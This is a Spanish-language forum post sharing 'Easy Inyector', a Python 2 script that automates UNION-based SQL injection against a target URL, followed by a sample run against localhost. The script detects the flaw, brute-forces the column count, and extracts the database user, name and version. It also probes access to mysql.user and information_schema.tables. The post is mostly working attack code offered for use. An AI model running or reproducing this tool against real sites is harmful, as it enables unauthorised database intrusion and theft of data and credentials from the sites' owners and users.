Autor
la siguiente version le agregare otras cosas y podra scanear varios en un archivo de texto.
Esta cosa busca:
* Vulnerabilidad (obvio)
* Limite de columnas
* Informacion sobre la base de datos
* Automaticamente buscar el numero que permite mostrar informacion
* Verifica existencia de mysql.user y information.schema.tables
Código
#!usr/bin/python
#Easy Inyector (C) Doddy Hackman 2010
import os,sys,urllib2,re
def clean():
if sys.platform=="win32":
os.system("cls")
else:
os.system("clear")
def header() :
print "\n--== Easy Inyector ==--\n"
def copyright() :
print "\n\n(C) Doddy Hackman 2010\n"
sys.exit(1)
def show() :
print "\n[*] Sintax : ",sys.argv[0]," <web>\n"
def toma(web) :
return urllib2.urlopen(web).read()
def bypass(bypass):
if bypass == "--":
return("+","--")
elif bypass == "/*":
return("/**/","/*")
else:
return("+","--")
def more(web,passx):
pass1,pass2 = bypass(passx)
print "\n[+] Searching more data\n"
web1 = re.sub("hackman","concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)",web)
code0 = toma(web1)
if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)):
datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)
datar = re.split("K0BRA",datax[0])
print "[+] Username :",datar[1]
print "[+] Database :",datar[2]
print "[+] Version :",datar[3],"\n"
code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
if (re.findall("K0BRA",code1)):
print "[+] mysql.user : on"
code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
if (re.findall("K0BRA",code2)):
print "[+] information_schema.tables : on"
def findlength(web,passx):
pass1,pass2 = bypass(passx)
print "\n[+] Finding columns length"
number = "concat(0x4b30425241,1,0x4b30425241)"
for te in range(2,30):
number = str(number)+","+"concat(0x4b30425241,"+str(te)+",0x4b30425241)"
code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+number+pass2)
if (re.findall("K0BRA(.*?)K0BRA",code)):
numbers = re.findall("K0BRA(.*?)K0BRA",code)
print "[+] Column length :",te
print "[+] Numbers",numbers,"print data"
sql = ""
tex = te + 1
for sqlix in range(2,tex):
sql = str(sql)+","+str(sqlix)
sqli = str(1)+sql
sqla = re.sub(numbers[0],"hackman",sqli)
more(web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla,passx)
print "\n[+] Scan Finished\n"
sys.exit(1)
print "[-] Length dont found\n"
def scan(web,passx):
pass1,pass2 = bypass(passx)
print "\n[+] Testing vulnerability"
code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+"1"+pass2)
if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
print "[+] SQLI Detected"
findlength(web,passx)
else:
print "[-] Not Vulnerable"
copyright()
header()
if len(sys.argv) != 2 :
show()
else :
try:
scan(sys.argv[1],"--")
except:
copyright()
#The End
Ejemplo de uso
Código:
C:/Users/DoddyH/Desktop/Arsenal X parte 2>sqli.py http://127.0.0.1/sql.php?id=
--== Easy Inyector ==--
[+] Testing vulnerability
[+] SQLI Detected
[+] Finding columns length
[+] Column length : 3
[+] Numbers ['1', '2', '3'] print data
[+] Searching more data
[+] Username : root@localhost
[+] Database : hackman
[+] Version : 5.1.41
[+] mysql.user : on
[+] information_schema.tables : on
[+] Scan Finished
(C) Doddy Hackman 2010
En línea
